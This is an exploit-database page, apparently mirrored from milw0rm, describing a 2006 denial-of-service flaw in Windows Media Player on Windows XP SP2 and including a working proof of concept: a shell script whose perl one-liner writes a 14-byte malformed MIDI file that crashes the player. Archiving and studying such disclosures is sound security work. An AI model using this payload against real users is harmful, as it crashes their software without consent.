header-logo
Suggest Exploit
vendor:
Windows Media Player
by:
milw0rm.com
7.5
CVSS
HIGH
Denial of Service
N/A
CWE
Product Name: Windows Media Player
Affected Version From: Windows Media 10.00.00.4036
Affected Version To: Windows XP SP2
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, XP
2006

Windows Media MID File Denial Of Service Vulnerability

A denial of service vulnerability exists in Windows Media Player when processing a specially crafted MIDI file. An attacker can exploit this vulnerability by sending a specially crafted MIDI file to the target user. The file size must be 14 bytes and the hex code must be 4D 54 68 64 00 00 00 06 00 00 00 00 00 00. When the target user opens the file, Windows Media Player will crash.

Mitigation:

Users should avoid opening untrusted MIDI files.
Source

Exploit-DB raw data:

#!/bin/sh
# Windows Media MID File Denial Of Service Vulnerability
# Tested:
# Windows Media 10.00.00.4036
# Windows XP SP2
# file "example.mid" (Hex-Code):
# 4D 54 68 64 00 00 00 06 00 00 00 00 00 00
# File size = 14 byte

perl -e 'print "\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00"' > example.mid

# milw0rm.com [2006-12-15]

Navigation

Suggest Exploit

Services By CQR